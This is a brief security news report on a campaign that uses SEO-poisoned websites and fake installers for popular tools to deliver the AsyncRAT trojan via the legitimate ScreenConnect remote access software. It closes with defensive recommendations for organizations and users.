Unknown threat actors deploy AsyncRAT through ScreenConnect, a legitimate remote access tool, in a widespread campaign targeting multiple regions and languages. Kaspersky identified the operation as a coordinated effort distributing malicious installers across numerous spoofed websites optimized for search engine visibility.
The malware poses as legitimate software, including OBS Studio, DNS Jumper, DS4Windows, and Bandicam. Users searching for these applications land on SEO-poisoned sites hosting fake installer archives. Once executed, these packages establish ScreenConnect connections and load AsyncRAT onto compromised systems.
AsyncRAT is an open-source remote access trojan with extensive capability for data theft, credential harvesting, and system manipulation. Attackers gain persistent access to victim machines through the legitimate ScreenConnect tool, making detection harder for endpoint protection systems that often whitelist commercial remote access software.
The scale and coordinated nature of this operation indicates organized threat actors exploiting several attack vectors simultaneously. The multi-domain, multi-language approach suggests targeting across geographic regions and language communities. SEO poisoning remains effective because users trust organic search results and download software from domains appearing legitimate at first glance.
Organizations should enforce application whitelisting policies and monitor ScreenConnect connections for anomalous behavior. Users should verify software downloads directly from official vendor websites rather than through search results, use checksums to validate installer integrity, and maintain current endpoint detection systems. The campaign demonstrates how attackers combine legitimate tools with social engineering and search manipulation to achieve initial access at scale.
